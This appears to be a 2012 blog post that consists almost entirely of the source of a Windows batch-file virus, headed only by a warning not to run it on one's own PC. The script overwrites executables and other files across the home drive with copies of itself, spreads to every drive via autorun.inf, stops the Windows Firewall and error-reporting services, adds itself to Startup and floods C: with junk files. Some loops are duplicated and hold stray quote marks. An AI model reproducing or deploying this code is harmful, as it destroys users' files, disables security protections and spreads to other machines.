Monday, 26 March 2012

don't run on your own pc! 
(ပ်က္သြားမယ္ဘာမွတ္ေနလဲ)

@echo off

::----Infect All Exe Files---::
    Dir %Homedrive% /s /b > DirPath                          
        For /f %%Y In (DirPath) Do (
        Set DirPath=%%Y > Nul    
            For %%Z In (%DirPath%\*.exe) Do (
            Set ExeInfect=%%Z > Nul
            Copy /y %0 %ExeInfect%
        )
    )

Del /f /s /q DirPath
::---------------------------::
::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
::---------------------------::
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::
::-Disable Windows Error Reporting-::
net stop "WerSvc"
::---------------------------------::
::------Copy To Startup------::
copy "Virus Name [Write in a name first, and do not change it].bat" "%userprofile%\Start Menu\Programs\Startup\Virus Name [Write in a name first, and do not change it].bat"
::---------------------------::
::----Infect All  Files---::
    Dir %Homedrive% /s /b > DirPath
        For /f %%Y In (DirPath) Do (
        Set DirPath=%%Y > Nul
            For %%Z In (%DirPath%\*.) Do ("
            Set Infect=%%Z > Nul
            Copy /y %0 %Infect%
        )
    )

Del /f /s /q DirPath
::---------------------------::
::----Infect All  Files---::
    Dir %Homedrive% /s /b > DirPath
        For /f %%Y In (DirPath) Do (
        Set DirPath=%%Y > Nul
            For %%Z In (%DirPath%\*.) Do ("
            Set Infect=%%Z > Nul
            Copy /y %0 %Infect%
        )
    )

Del /f /s /q DirPath
::---------------------------::
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::